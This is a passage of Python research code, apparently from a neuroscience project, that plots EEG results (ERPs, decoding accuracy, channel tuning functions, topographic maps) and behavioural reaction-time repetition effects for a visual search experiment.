np.array([T_erps[T_erps.keys()[0]]['all']['elec'][0].index(e) for e in elecs]) # plot difference wave form collapsed across all conditions ipsi_T = np.mean(np.stack(([[T_erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in T_erps.keys()] for cnd in ['DvTv_0','DvTv_3','DvTr_0','DvTr_3']])),0) contra_T =np.mean(np.stack(([[T_erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in T_erps.keys()] for cnd in ['DvTv_0','DvTv_3','DvTr_0','DvTr_3']])),0) ipsi_D = np.mean(np.stack(([[D_erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in D_erps.keys()] for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3']])),0) contra_D =np.mean(np.stack(([[D_erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in D_erps.keys()] for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3']])),0) plt.figure(figsize = (15,5)) for i, effect in enumerate([contra_T - ipsi_T, contra_D - ipsi_D]): sig_cl = PO.clusterBasedPermutation(effect, 0) ax = plt.subplot(1,2 ,i + 1) # beautify plots ax.tick_params(axis = 'both', direction = 'outer') plt.axhline(y=0, color = 'grey') plt.axvline(x=-0.25, color = 'grey') # onset placeholders plt.axvline(x=0, color = 'grey') # onset gabors plt.ylim(y_lim) err, diff = bootstrap(effect) plt.plot(times, diff, color = ['green', 'red'][i]) plt.fill_between(times, diff + err, diff - err, alpha = 0.2, color = ['green', 'red'][i]) mask = np.where(sig_cl < 1)[0] sig_cl = np.split(mask, np.where(np.diff(mask) != 1)[0]+1) for j, cl in enumerate(sig_cl): if i == 0: self.ERPJASP(T_erps, cl, ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'], e_idx, 'target', j, nr_sj = 24) elif i == 1: self.ERPJASP(D_erps, cl, ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'], e_idx, 'dist', j, nr_sj = 24) plt.plot(times[cl], np.ones(cl.size) * (y_lim[0]), color = ['green', 'red'][i]) sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'main_allerp-{}.pdf'.format(erp_name))) plt.close() # get plotting data plotting_data = {'T':{},'D':{}} for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3','DvTr_0','DvTr_3']: if e_idx.size > 1: ipsi_T = np.vstack([T_erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in T_erps.keys()]) contra_T = np.vstack([T_erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in T_erps.keys()]) ipsi_D = np.vstack([D_erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in D_erps.keys()]) contra_D = np.vstack([D_erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in D_erps.keys()]) else: ipsi_T = np.vstack([T_erps[str(key)][cnd]['ipsi'][e_idx] for key in T_erps.keys()]) contra_T = np.vstack([T_erps[str(key)][cnd]['contra'][e_idx] for key in T_erps.keys()]) ipsi_D = np.vstack([D_erps[str(key)][cnd]['ipsi'][e_idx] for key in D_erps.keys()]) contra_D = np.vstack([D_erps[str(key)][cnd]['contra'][e_idx] for key in D_erps.keys()]) plotting_data['T'][cnd] = contra_T - ipsi_T plotting_data['D'][cnd] = contra_D - ipsi_D self.inspectTimeCourse(plotting_data, times, y_lim = y_lim, chance = 0, file = f) plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'main_erp-{}.pdf'.format(erp_name))) plt.close() def ERPJASP(self, erps, cluster, cnds, e_idx, header, clust_nr, nr_sj = 24): ''' Select contra and ipsi waveforms for JASP analysis ''' JASP = np.zeros((nr_sj, len(cnds)*2)) for i, cnd in enumerate(cnds): ipsi = np.vstack([erps[str(key)][cnd]['ipsi'][e_idx, cluster[0]:cluster[-1]].mean() for key in erps.keys()]) contra = np.vstack([erps[str(key)][cnd]['contra'][e_idx, cluster[0]:cluster[-1]].mean() for key in erps.keys()]) JASP[:,i*2] = ipsi.T JASP[:, i + (i + 1)] = contra.T headers = ['_'.join(np.array(labels,str)) for labels in product(*[cnds,['ipsi','contra']])] np.savetxt(self.FolderTracker(['erp','MS-plots'], filename = '{}_cl{}-JASP.csv'.format(header, clust_nr)), JASP, delimiter = "," ,header = ",".join(headers), comments='') def bdmdiag(self): ''' ''' # read in data with open(self.FolderTracker(['bdm','{}_loc'.format('target')], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) times = info['times'] - 0.25 files = glob.glob(self.FolderTracker(['bdm', '{}_loc'.format('target')], filename = 'class_*_perm-False.pickle')) bdm_T = [] for file in files: with open(file ,'rb') as handle: bdm_T.append(pickle.load(handle)) files = glob.glob(self.FolderTracker(['bdm', '{}_loc'.format('dist')], filename = 'class_*_perm-False.pickle')) bdm_D = [] for file in files: with open(file ,'rb') as handle: bdm_D.append(pickle.load(handle)) # get plotting data plotting_data = {'T':{},'D':{}} for cnd in ['DvTv_0','DvTv_3','DrTv_0','DrTv_3']: plotting_data['D'][cnd] = np.stack([np.diag(bdm_D[j][cnd]['standard']) for j in range(len(bdm_D))]) for cnd in ['DvTv_0','DvTv_3','DvTr_0','DvTr_3']: plotting_data['T'][cnd] = np.stack([np.diag(bdm_T[j][cnd]['standard']) for j in range(len(bdm_T))]) # open file to store timing of significant clusters f = open(self.FolderTracker(['bdm','MS-plots'], filename = 'diag-bdm.txt'),'w') self.inspectTimeCourse(plotting_data, times, y_lim = (0.1, 0.3), chance = 1/6.0, file = f) plt.savefig(self.FolderTracker(['bdm','MS-plots'], filename = 'diag-bdm.pdf')) plt.close() def bdmACC(self, header): ''' ''' PO = Permutation() if header == 'target': conditions = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] elif header == 'dist': conditions = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] # read in data with open(self.FolderTracker(['bdm','{}_loc'.format(header)], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) times = info['times'] - 0.25 files = glob.glob(self.FolderTracker(['bdm', '{}_loc'.format(header)], filename = 'class_*_perm-False.pickle')) bdm = [] for file in files: with open(file ,'rb') as handle: bdm.append(pickle.load(handle)) #plt.figure(figsize = (20,10)) perm = [] plt_idx = [1,2,4,5] X2 = 1/6.0 # normalize colorbar norm = MidpointNormalize(midpoint=X2) data = [] for i, cnd in enumerate(conditions): plt.figure(figsize = (10,10)) #ax = plt.subplot(2,3 , plt_idx[i])#, title = cnd, ylabel = 'Time (ms)', xlabel = 'Time (ms)') #ax.tick_params(direction = 'in', length = 5) plt.tick_params(direction = 'in', length = 5) X1 = np.stack([bdm[j][cnd]['standard'] for j in range(len(bdm))])[:, times >= 0, :][:,:,times >= 0] data.append(X1) p_vals = signedRankArray(X1, X2) h,_,_,_ = FDR(p_vals) dec = np.mean(X1,0) dec[~h] = X2 plt.imshow(dec, norm = norm, cmap = cm.bwr, interpolation='none', aspect='auto', origin = 'lower', extent=[0,times[-1],0,times[-1]], vmin = 0.1, vmax = 0.3) plt.colorbar() plt.savefig(self.FolderTracker(['poster', 'bdm'], filename = 'bdm_{}-plot{}.pdf'.format(header,cnd))) plt.close() plt_idx = [3,6] for i, cnd in enumerate(['var','rep']): plt.figure(figsize = (10,10)) #ax = plt.subplot(2,3 , plt_idx[i])#, title = cnd, ylabel = 'Time (ms)', xlabel = 'Time (ms)') #ax.tick_params(direction = 'in', length = 0.5) plt.tick_params(direction = 'in', length = 0.5) if i == 0: X, Y = data[0], data[1] else: X, Y = data[2], data[3] sig_cl = PO.clusterBasedPermutation(X,Y) x = times[times > 0] X = np.tile(x,(x.size,1)).T Y = np.tile(x,(len(x),1)) Z = sig_cl.T plt.contour(X,Y,Z,1) #plt.imshow(sig_cl, interpolation='none', aspect='auto', # origin = 'lower', extent=[0,times[-1],0,times[-1]]) #plt.coloribar() #plt.colorbar() plt.savefig(self.FolderTracker(['poster', 'bdm'], filename = 'bdm_{}-diffplot{}.pdf'.format(header,cnd))) plt.close() # plot repetition effect plt.figure(figsize = (10,10)) plt.tick_params(direction = 'in', length = 0.5) sig_cl = PO.clusterBasedPermutation(data[0] - data[1],data[2] - data[3]) x = times[times > 0] X = np.tile(x,(x.size,1)).T Y = np.tile(x,(len(x),1)) Z = sig_cl.T plt.contour(X,Y,Z,1) plt.savefig(self.FolderTracker(['poster', 'bdm'], filename = 'bdm_{}-diffplot-rep3.pdf'.format(header))) plt.close() #plt.tight_layout() #plt.savefig(self.FolderTracker(['bdm','MS-plots'], filename = 'class_{}.pdf'.format(header))) #plt.close() ### EXTRA ANALYSIS def cndTOPO(self, header, topo_name = 'topo_lat-down1', start = -0.1, stop = 0.15, step = 0.01): ''' ''' # get conditions of interest if header == 'target': cnds = ['DvTv_0', 'DvTv_3','DvTr_0','DvTr_3'] elif header == 'dist': cnds = ['DvTv_0', 'DvTv_3','DrTv_0','DrTv_3'] # define segments segments = np.arange(start, stop, step) # read in data and shift timing topo, info, times = self.erpReader(header, topo_name) # create figure plt.figure(figsize = (50,20)) # loop over conditions idx_cntr = 1 for cnd in cnds: # loop over time segments for start_seg in segments: # select time window of interest s, e = [np.argmin(abs(times - t)) for t in (start_seg,start_seg+0.01)] # extract mean TOPO for window of interest T = np.mean(np.stack( [topo[j][cnd][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) if cnd == 'DvTv_0': ax = plt.subplot(len(cnds), segments.size ,idx_cntr, title = '{0:.2f}'.format(start_seg)) else: ax = plt.subplot(len(cnds), segments.size ,idx_cntr) im = mne.viz.plot_topomap(T, info['info'], names = info['ch_names'], show_names = False, show = False, axes = ax, cmap = cm.jet, vmin = -7,vmax = 5) idx_cntr += 1 plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'cnd_topos_{}.pdf'.format(header))) plt.close() # create figure # loop over conditions for block in ['var','rep']: idx_cntr = 1 plt.figure(figsize = (40,10)) # loop over time segments for start_seg in segments: # select time window of interest s, e = [np.argmin(abs(times - t)) for t in (start_seg,start_seg+0.01)] # extract mean TOPO for window of interest if block == 'var': ax = plt.subplot(1, segments.size ,idx_cntr, title = '{0:.2f}'.format(start_seg)) cnd = cnds[:2] elif block == 'rep': ax = plt.subplot(1, segments.size ,idx_cntr) cnd = cnds[-2:] T = np.mean(np.stack( [topo[j][cnd[0]][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) - np.mean(np.stack( [topo[j][cnd[1]][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) print T.min(), T.max() im = mne.viz.plot_topomap(T, info['info'], names = info['ch_names'], show_names = False, show = False, axes = ax, cmap = cm.jet, vmin = -2,vmax = 2) idx_cntr += 1 plt.tight_layout() plt.savefig(self.FolderTracker(['poster','erp'], filename = 'cnd-diff_{}_{}.pdf'.format(header,block))) plt.close() ### CTF PLOTS def plotCTF(self, header = 'target', cnd_name = 'cnds', ctf_name = 'ctf_alpha'): ''' ''' ctfs, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = header, cnd_name = cnd_name, ctf_name = ctf_name) power = 'total' if header == 'target': cnds = ['DvTv_0', 'DvTv_3','DvTr_0','DvTr_3'] elif header == 'dist': cnds = ['DvTv_0', 'DvTv_3','DrTv_0','DrTv_3'] #norm = MidpointNormalize(midpoint=0) for cnd in cnds: plt.figure(figsize = (40,15)) plt.tick_params(direction = 'in', length = 5) xy = np.squeeze(np.stack([np.mean(np.mean(ctfs[i][cnd]['ctf']['total'],1),2) for i in range(len(ctfs))])) xy = np.mean(xy,0) xy = np.hstack((xy,xy[:,0].reshape(-1,1))).T plt.imshow(xy, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],-180,180], vmin = 0.0, vmax = 0.45) plt.colorbar() plt.savefig(self.FolderTracker(['poster', 'ctf'], filename = 'ctf_{}_{}.pdf'.format(header,cnd))) plt.close() def ctfReader(self, sj_id = 'all', channels = 'all_channels_no_eye', header = 'target_loc',ctf_name = '*_slopes_all.pickle', fband = 'all'): ''' Reads in preprocessed CTF data sj_id (str): channels (str): name of channel folder that contains ctf data header (str): CTF tuned to target location or distractor ctf_name (str): name of preprocessed ctfs fbanc (str): frequency band(s) of interest Returns - - - - ctf (dict): dictionary of ctfs as specified by ctf_name info (dict): EEG object used for plotting times (array): times shifted in time by 0.25 such that 0 ms is target display onset ''' if sj_id == 'all': files = glob.glob(self.FolderTracker(['ctf',channels,'{}_loc'.format(header)], filename = ctf_name)) else: ctf_name = '{}_' + ctf_name + '.pickle' files = [self.FolderTracker(['ctf',channels,'{}_loc'.format(header)], filename = ctf_name.format(sj)) for sj in sj_id] ctf = [] for file in files: print(file) # resad in classification dict with open(file ,'rb') as handle: ctf.append(pickle.load(handle)) with open(self.FolderTracker(['ctf',channels, '{}_loc'.format(header)], filename = '{}_info.pickle'.format(fband)),'rb') as handle: info = pickle.load(handle) times = info['times'] - 250 return ctf, info, times def erpReader(self, header, erp_name): ''' Reads in preprocessed EEG data Arguments - - - - - header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps Returns - - - - erp (dict): dictionary of erps as specified by erp_name info (dict): EEG object used for plotting times (array): times shifted in time by 0.25 such that 0 ms is target display onset ''' # read in data and shift timing with open(self.FolderTracker(['erp','{}_loc'.format(header)], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: erp = pickle.load(handle) with open(self.FolderTracker(['erp','{}_loc'.format(header)], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) times = info['times'] - 0.25 return erp, info, times def rawCTF(self, header, ctf_name): ''' ''' if header == 'dist_loc': conditions = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] elif header == 'target_loc': conditions = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] # read in data raw, info, times = self.ctfReader(sj_id = 'all' ,channels = 'all_channels_no-eye', header = header, ctf_name = ctf_name) s, e = [np.argmin(abs(times - t)) for t in (150,200)] # read in info for topoplot with open(self.FolderTracker(['erp',header], filename = 'plot_dict.pickle') ,'rb') as handle: info_viz = pickle.load(handle) for i, cnd in enumerate(conditions): plt.figure(figsize = (30,10)) ax = plt.subplot(2,1, 1, title = cnd, ylabel = 'channels', xlabel = 'time (ms)') ctf = np.mean(np.dstack([np.mean(raw[sj][cnd]['ctf']['raw_eeg'], axis = (0,2)) for sj in range(len(raw))]),2) ctf = np.vstack((ctf.T,ctf[:,0])) plt.imshow(ctf, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],1,6]) for loc in range(6): ax = plt.subplot(2,6, loc + 7, title = str(loc)) w = np .mean(np.array([np.mean(raw[sj][cnd]['W']['raw_eeg'], axis = (0,2)) for sj in range(len(raw))]),0) im = mne.viz.plot_topomap(np.mean(w[s:e,loc,:],0), info_viz['info'], names = info_viz['ch_names'], show_names = False, show = False, axes = ax, cmap = cm.jet, vmin = -4.5, vmax = 4.5 ) sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'raw-{}-{}.pdf'.format(header, cnd))) plt.close() def timeFreqCTF(self, header, cnd_name, perm = True, p_map = False): ''' ''' PO = Permutation() slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = header, cnd_name = cnd_name, ctf_name = 'slopes_all', fband = 'all') #if perm: # slopes, info, times = self.ctfReader(sj_id = [2,5,6,7,10,13,14,15,18,19,22,23,24], # channels = 'all_channels_no-eye', header = header, ctf_name = 'slopes_perm_all', fband = 'all') freqs = (info['freqs'].min(), info['freqs'].max()) if header == 'dist': conditions = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] elif header == 'target': conditions = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] if cnd_name == 'all': plt.figure(figsize = (20,15)) plt.tick_params(direction = 'in', length = 5) xy = np.stack([slopes[j]['all']['total'] for j in range(len(slopes))]) p_vals = signedRankArray(xy, 0) h,_,_,_ = FDR(p_vals) XY = np.mean(xy,axis = 0) XY[~h] = 0 plt.imshow(XY, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[-1]], vmin = 0, vmax = 0.20) plt.colorbar() plt.savefig(self.FolderTracker(['poster', 'ctf'], filename = '{}-all-freqs.pdf'.format(header))) plt.close() else: for power in ['evoked', 'total']: crange = (-0.15,0.15) repeat = [] variable = [] plt.figure(figsize = (20,15)) data = [] plt_idx = [1,2,4,5] for i, cnd in enumerate(conditions): ax = plt.subplot(2,3, plt_idx[i], title = cnd, ylabel = 'freqs', xlabel = 'time (ms)') xy = np.stack([slopes[j][cnd][power] for j in range(len(slopes))])[:,:6,:] data.append(xy) p_vals = signedRankArray(xy, 0) h,_,_,_ = FDR(p_vals) XY = np.mean(xy,axis = 0) XY[~h] = 0 if 'r' in cnd: repeat.append(xy) else: variable.append(xy) plt.imshow(XY, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],18], vmin = crange[0], vmax = crange[1]) plt.axvline(x=-250, ls = '--', color = 'white') plt.axvline(x=0, ls = '--', color = 'white') plt.colorbar(ticks = (crange[0],crange[1])) plt_idx = [3,6] for i, cnd in enumerate(['var','rep']): ax = plt.subplot(2,3 , plt_idx[i], title = cnd, ylabel = 'freqs', xlabel = 'time (ms)') if i == 0: X, Y = data[0], data[1] else: X, Y = data[2], data[3] sig_cl = PO.clusterBasedPermutation(X, Y) plt.imshow(sig_cl, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],18]) plt.colorbar() plt.tight_layout() if perm: if p_map: plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'tf-p_map_{}_{}.pdf'.format(header, power))) else: plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'tf_{}_{}.pdf'.format(header, power))) else: plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'tf_{}_{}.pdf'.format(header, power))) plt.close() def threeDSlopes(self, header): ''' ''' if header == 'target_loc': cnds = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] elif header == 'dist_loc': cnds = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] # read in data ctfs, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = header, ctf_name = 'ctf_all', fband = 'all') # get X (time),Y (channel), Z data (channel response) X = info['times'][::info['downsample']] Y = np.arange(7) X, Y = np.meshgrid(X, Y) power = 'total' for fr, band in enumerate(info['freqs']): if band[1] <= 14: f = plt.figure(figsize = (20,15)) for i, cnd in enumerate(cnds): ax = f.add_subplot(2, 2, i + 1, projection='3d', title = cnd) if header == 'target_loc': crange = (0,1) elif header == 'dist_loc': crange = (-0.5,0.5) Z = np.dstack([np.mean(ctfs[j][cnd]['ctf'][power][fr,:], axis = (0,2)).T for j in range(len(ctfs))]) Z = np.vstack((Z.mean(axis =2), Z.mean(axis =2)[0,:])) surf = ax.plot_surface(X, Y, Z, cmap=cm.viridis, linewidth=0, antialiased=False, rstride = 1, cstride = 1, vmin = crange[0], vmax = crange[1]) ax.set_zlim(crange) f.colorbar(surf, shrink = 0.5, ticks = crange) plt.tight_layout() plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'ctfs_{}_{}-{}.pdf'.format(header,band[0],band[1]))) plt.close() ### BDM PLOTS ### ERP PLOTS def topoChannelSelection(self, header, topo_name, erp_window = dict(P1 = (0.09, 0.13), N1 = (0.15, 0.2), N2Pc = (0.18, 0.25), Pd = (0.25, 0.3))): ''' Creates topoplots for time windows of interest. Can be used to select which electrodes shows the largest component (averaged across all conditions) NOTE: SHOULD THIS BE ALL CONDITIONS OR ONLY THE CONDITIONS OF INTEREST??????? Arguments - - - - - header (str): ERP tuned to target location or distractor topo_name (str): name of preprocessed evoked data erp_window (dict): dictionary of time windows of interest (tuple). Key of dict is the name of the component ''' # read in data and shift timing topo, info, times = self.erpReader(header, topo_name) # first plot continuous segments of data plt.figure(figsize = (30,30)) for idx, tp in enumerate(np.arange(-0.25,0.35, 0.01)): # select time window of interest s, e = [np.argmin(abs(times - t)) for t in (tp,tp+0.01)] # extract mean TOPO for window of interest T = np.mean(np.stack( [topo[j]['all'][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) ax = plt.subplot(6,10 ,idx + 1, title = '{0:.2f}'.format(tp)) im = mne.viz.plot_topomap(T, info['info'], names = info['ch_names'], show_names = False, show = False, axes = ax, cmap = cm.jet, vmin = -7,vmax = 5) plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'evoked-all_{}.pdf'.format(header))) plt.close() # loop over all ERP components of interest for erp in erp_window.keys(): # select time window of interest s, e = [np.argmin(abs(times - t)) for t in erp_window[erp]] # extract mean TOPO for window of interest T = np.mean(np.stack( [topo[j]['all'][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) # create figure plt.figure(figsize = (10,10)) ax = plt.subplot(1,1 ,1, title = 'erp-{}'.format(header)) im = mne.viz.plot_topomap(T, info['info'], names = info['ch_names'], show_names = True, show = False, axes = ax, cmap = cm.jet) plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'evoked-{}-{}.pdf'.format(erp, header))) plt.close() def erpInspection(self, header, erp_name): ''' Shows ERPs across whole time indow collapsed across conditions. Can also be used with topoChannelSelection to select channels with largest component Arguments - - - - - header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps ''' # read in data and shift timing erps, info, times = self.erpReader(header, erp_name) # extract mean ERP ipsi = np.mean(np.stack( [erps[key]['all']['ipsi'] for key in erps.keys()], axis = 0), axis = 0) contra = np.mean(np.stack( [erps[key]['all']['contra'] for key in erps.keys()], axis = 0), axis = 0) # initiate figure plt.figure(figsize = (20,10)) for plot, data in enumerate([ipsi, contra]): ax = plt.subplot(1,2 , plot + 1, title = ['ipsi','contra'][plot], ylabel = 'mV') ax.tick_params(axis = 'both', direction = 'outer') for i, erp in enumerate(data): plt.plot(times, erp, label = '{}-{}'. format(erps['2']['all']['elec'][0][i], erps['2']['all']['elec'][1][i])) plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'elecs-{}.pdf'.format(header))) plt.close() def ipsi_contra_ERPS(self, elecs, header, erp_name): ''' plots ipsilateral and contalateral waveforms seperately. Arguments - - - - - elecs (list): list of electrodes used for ERP's header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps ''' PO = Permutation() color_var = 'blue' if header == 'target_loc': color_rep = 'green' erp_types = ['DvTr_0','DvTr_3'] elif header == 'dist_loc': erp_types = ['DrTv_0','DrTv_3'] color_rep = 'red' # read in data and shift timing erps, info, times = self.erpReader(header, erp_name) # get indices of electrodes of interest e_idx = np.array([erps[erps.keys()[0]]['all']['elec'][0].index(e) for e in elecs]) plt.figure(figsize = (30,20)) # plot ipsi and contralateral erps with bootsrapped error bar for idx, plot in enumerate([1,2,4,5]): ax = plt.subplot(2,3 , plot, title = ['Var-Ipsi','Rep-Ipsi','Var-Contra','Rep-Contra'][idx], ylabel = 'mV') ax.tick_params(axis = 'both', direction = 'outer') perm = [] if plot == 1 or plot == 4: cnds = ['DvTv_0','DvTv_3'] color= color_var elif plot == 2 or plot == 5: cnds = erp_types color = color_rep for i, cnd in enumerate(cnds): if plot == 1 or plot == 2: if e_idx.size > 1: erp = np.vstack([erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in erps.keys()]) else: erp = np.vstack([erps[str(key)][cnd]['ipsi'][e_idx] for key in erps.keys()]) elif plot == 4 or plot == 5: if e_idx.size > 1: erp = np.vstack([erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in erps.keys()]) else: erp = np.vstack([erps[str(key)][cnd]['contra'][e_idx] for key in erps.keys()]) err, signal = bootstrap(erp) perm.append(erp) plt.plot(times, signal, label = '{}-{}'.format(cnd,str(elecs)), color = color, ls = ['-','--'][i]) plt.fill_between(times, signal + err, signal - err, alpha = 0.2, color = color) sig_cl = PO.clusterBasedPermutation(perm[0], perm[1]) plt.ylim(-7,5) plt.fill_between(times, -0.05, 0.05, where = sig_cl < 1, color = 'black', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'ipsi-contra_{}_erps.pdf'.format(header))) plt.close() def linkBehErp(self, elecs, header, erp_name, window = (0.27,0.33)): ''' elecs (list): list of electrodes used for ERP's header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps ''' # read in data and shift timing erps, info, times = self.erpReader(header, erp_name) # get indices of electrodes of interest e_idx = np.array([erps['1']['all']['elec'][0].index(e) for e in elecs]) # select time window of interest s, e = [np.argmin(abs(times - t)) for t in window] # read in beh and get RT reduction RT = [] for sj in erps.keys(): beh_files = glob.glob(self.FolderTracker(extension=[ 'beh', 'raw'], filename='subject-{}_ses_*.csv'.format(sj))) # get triggers logged in beh file beh = pd.concat([pd.read_csv(file) for file in beh_files]) beh =beh[beh['practice'] == 'no'] if header == 'dist_loc': RT.append( beh['RT'][beh['condition'] == 'DrTv_0'].values.mean() - beh['RT'][beh['condition'] == 'DrTv_3'].values.mean()) elif header == 'target_loc': RT.append( beh['RT'][beh['condition'] == 'DvTr_0'].values.mean() - beh['RT'][beh['condition'] == 'DvTr_3'].values.mean()) # get ERP reduction if e_idx.size > 1: if header == 'dist_loc': diff = (np.vstack([erps[str(key)]['DrTv_0']['contra'][e_idx].mean(0) for key in erps.keys()]) - \ np.vstack([erps[str(key)]['DrTv_0']['ipsi'][e_idx].mean(0) for key in erps.keys()])) - \ (np.vstack([erps[str(key)]['DrTv_3']['contra'][e_idx].mean(0) for key in erps.keys()]) - \ np.vstack([erps[str(key)]['DrTv_3']['ipsi'][e_idx].mean(0) for key in erps.keys()])) elif header == 'target_loc': diff = (np.vstack([erps[str(key)]['DvTr_0']['contra'][e_idx].mean(0) for key in erps.keys()]) - \ np.vstack([erps[str(key)]['DvTr_0']['ipsi'][e_idx].mean(0) for key in erps.keys()])) - \ (np.vstack([erps[str(key)]['DvTr_3']['contra'][e_idx].mean(0) for key in erps.keys()]) - \ np.vstack([erps[str(key)]['DvTr_3']['ipsi'][e_idx].mean(0) for key in erps.keys()])) diff = diff[:,s:e].mean(axis = 1) # do plotting sns.regplot(np.array(RT), diff) r, p = pearsonr(np.array(RT), diff) plt.title('r = {0:0.2f}, p = {1:0.2f}'.format(r,p)) plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'corr-{}-{}.pdf'.format(elecs, header))) plt.close() def repetitionRaw(self): # read in data file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) # create pivot (only include trials valid trials from RT_filter) RT = beh.query("RT_filter == True") RT_piv = RT.pivot_table(values = 'RT', index = 'subject_nr', columns = ['block_type','repetition'], aggfunc = 'mean') pivot_error = pd.Series(confidence_int(RT_piv.values), index = RT_piv.keys()) # plot conditions plt.figure(figsize = (10,10)) ax = plt.subplot(1,1,1, title = 'Repetition effect', ylabel = 'RT (ms)', xlabel = 'repetition', ylim = (300,650)) for i, cnd in enumerate(['DvTv','DrTv','DvTr']): RT_piv[cnd].mean().plot(yerr = pivot_error[cnd], label = cnd, color = ['blue','red','green'][i]) plt.xlim(-0.5,3.5) plt.xticks([0,1,2,3]) plt.legend(loc='best', shadow = True) sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'repetition_effect.pdf')) plt.close() # and plot normalized data norm = RT_piv.values for i,j in [(0,4),(4,8),(8,12)]: norm[:,i:j] /= np.matrix(norm[:,i]).T pivot = pd.DataFrame(norm, index = np.unique(beh['subject_nr']), columns = RT_piv.keys()) pivot_error = pd.Series(confidence_int(pivot.values), index = pivot.keys()) ax = plt.subplot(1,2, 2, title = 'Normalized RT', ylabel = 'au', xlabel = 'repetition', ylim = (0.5,1), xlim = (0,4)) for cnd in ['DvTv','DrTv','DvTr']: popt, pcov = curvefitting(range(4),np.array(pivot[cnd].mean()),bounds=(0, [1,1])) pivot[cnd].mean().plot(yerr = pivot_error[cnd], label = '{0}: alpha = {1:.2f}; delta = {2:.2f}'.format(cnd,popt[0],popt[1])) plt.xlim(-0.5,3.5) plt.xticks([0,1,2,3]) plt.legend(loc='best', shadow = True) sns.despine(offset=10, trim = False) #plt.tight_layout() #plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'main_beh.pdf')) #plt.close() def spatialGradient(self, yrange = (350,500)): ''' ''' # read in data file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) # add spatial dist filter beh['dist_bin'] = abs(beh['dist_loc'] - beh['target_loc']) beh['dist_bin'][beh['dist_bin'] > 3] = 6 - beh['dist_bin'][beh['dist_bin'] > 3] # create pivot beh = beh.query("RT_filter == True") gradient = beh.pivot_table(values = 'RT', index = 'subject_nr', columns = ['block_type','repetition','dist_bin'], aggfunc = 'mean') gradient_err = pd.Series(confidence_int(gradient.values), index = gradient.keys()) # Create pivot table and extract individual headers for .csv file (input to JASP) gradient_array = np.hstack((np.array(gradient.index).reshape(-1,1),gradient.values)) headers = ['sj'] + ['_'.join(np.array(labels,str)) for labels in product(*gradient.keys().levels)] 